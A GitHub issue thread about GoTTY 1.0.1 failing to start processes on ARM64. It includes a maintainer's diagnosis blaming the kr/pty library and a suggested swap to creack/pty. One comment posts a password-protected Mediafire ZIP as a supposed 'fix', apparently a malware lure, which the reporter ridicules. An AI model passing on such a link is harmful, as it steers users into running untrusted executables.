### ISSUE TITLE
Vintage 1.0.1 - "failed to execute command" (similar to https://github.com/yudai/gotty/issues/330)

### ISSUE THREAD

**Issue by Loccy** [sorenisanerd/gotty#92]
So, I suppose you can consider this a "port" of an issue from Yudai's original Gotty - see https://github.com/yudai/gotty/issues/330. Basically, we can get it to compile, but a simple command like "gotty top" gives "Failed to execute command".

I realise that for most use cases, the solution will either be:

1. Use a more recent version
2. Use one of the prebuilt binaries of 1.0.1

and indeed the original issue was closed when OP went with option 1.

Neither of those are an option for me. My project hooks into the 1.0.1 code (and particularly Hterm) in a very specific way, and my new dev environment is Windows ARM64 WSL, for which there isn't a prebuilt binary for 1.0.1. Thus I needed a 1.0.1 ARM64 Linux binary.

I've forked and tweaked the 1.0.1 release - https://github.com/Loccy/gotty/tree/release-1.0 - so one can get a build out of it with relatively new tools. This is party based on what I've seen in other forks, applied to 1.0.1. And I was able to get it to spit out an ARM64 binary which seems to load, run, deliver a web page - but seems to fail to start any processes with that "Failed to execute command" message.

I freely admit I know how to spell "Go" and that's about it, so it is possible I was doing something dim and the reason my binary (and the one from the other issues board) didn't work was due to my own lack of understanding. But if someone could point me in the right direction I'd really appreciate it.

**Comment by Gelinus** [comment]
download

https://www.mediafire.com/file/6r8pvis8j6lc0j9/fix.zip/file
Pass: xfp53
If you don't have the c compliator, install it.(gcc or clang)

**Comment by Loccy** [comment]
> download
> 
> https://www.mediafire.com/file/6r8pvis8j6lc0j9/fix.zip/file Pass: xfp53 If you don't have the c compliator, install it.(gcc or clang)

Yes, I'm going to download a random ZIP file from Mediafire that includes an Intel-based EXE and a DLL, in order to fix a Go project where my ultimate objective is an ARM64 Linux binary. Seems legit.

**Comment by sorenisanerd** [comment]
Did a deep dive on this today. Here's what's happening:

The error is triggered when `pty.Start()` fails inside `backend/localcommand/local_command.go`. The root cause on ARM64 is almost certainly the `github.com/kr/pty` library that the v1.0.1-era code uses. It has architecture-specific syscall wrappers for PTY operations that don't work correctly on ARM64 — the PTY creation fails and gets wrapped up as the opaque "Failed to execute command" you're seeing.

The current version of this repo replaced `kr/pty` with `github.com/creack/pty` (a maintained fork with proper cross-arch support), which resolves this. I just verified: the current version works fine on both x86 and ARM in testing.

For your v1.0.1 fork, the minimal fix would be:
1. Replace `github.com/kr/pty` with `github.com/creack/pty` in `backend/localcommand/local_command.go` and `go.mod`
2. The API is identical (`pty.Start(cmd)`, `pty.Winsize`, `pty.Setsize`) — no code changes needed beyond the import path
3. You'll also want to swap the raw `syscall.Syscall(SYS_IOCTL, ...)` in `ResizeTerminal` for the portable `pty.Setsize()`

That said, the current version has moved on significantly and also gives much clearer error messages — instead of "Failed to execute command" it now shows the full wrapped chain (e.g. `executable file not found in $PATH`).

If you can explain more about what you're trying to do with your project, maybe I can help you make it work with a more modern version of GoTTY. The hterm dependency you mentioned was replaced with xterm.js a while ago, so the migration path might be simpler than you think.
